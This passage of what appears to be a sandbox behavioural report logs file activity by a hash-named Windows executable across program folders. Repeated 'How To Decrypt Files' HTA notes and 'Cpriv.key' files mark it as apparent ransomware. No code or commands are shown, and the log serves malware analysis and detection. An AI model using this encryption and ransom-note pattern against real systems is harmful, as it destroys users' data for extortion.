14\Theme Fonts\Metro.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN054.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\MSB1ESEN.ITS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107456.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Process Library.fdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGN.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)redStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222019.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21295_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADDINS\OUTEX2.ECF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\slideShow.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0098497.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART1.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293238.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00965_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BDRTKFUL.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\PROFILE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Apex.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB7.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SATIN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00231_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00442_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WZCNFLCT.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOAT.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Metro.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\icudtl.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05665_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUP.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\REMINDER.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ONGuide.onepkg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106208.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL106.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_on.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14754_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SHOW_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Median.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\defaults\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106958.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\WORDIRMV.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\dtplugin\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsBrowserUpgrade.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\sl.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATER\WATER.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SUBMIT.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-execution.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSGR3EN.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL001.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\XLINTL32.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\3082\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14578_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\jfr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185806.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01006_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\CASHREG.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR42F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART7.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SNIPE.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSRETRO.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\81.0.4044.129 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GROOVE.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\DEEPBLUE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSGR3FR.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BAN98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00132_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Stationery\Cpriv.key 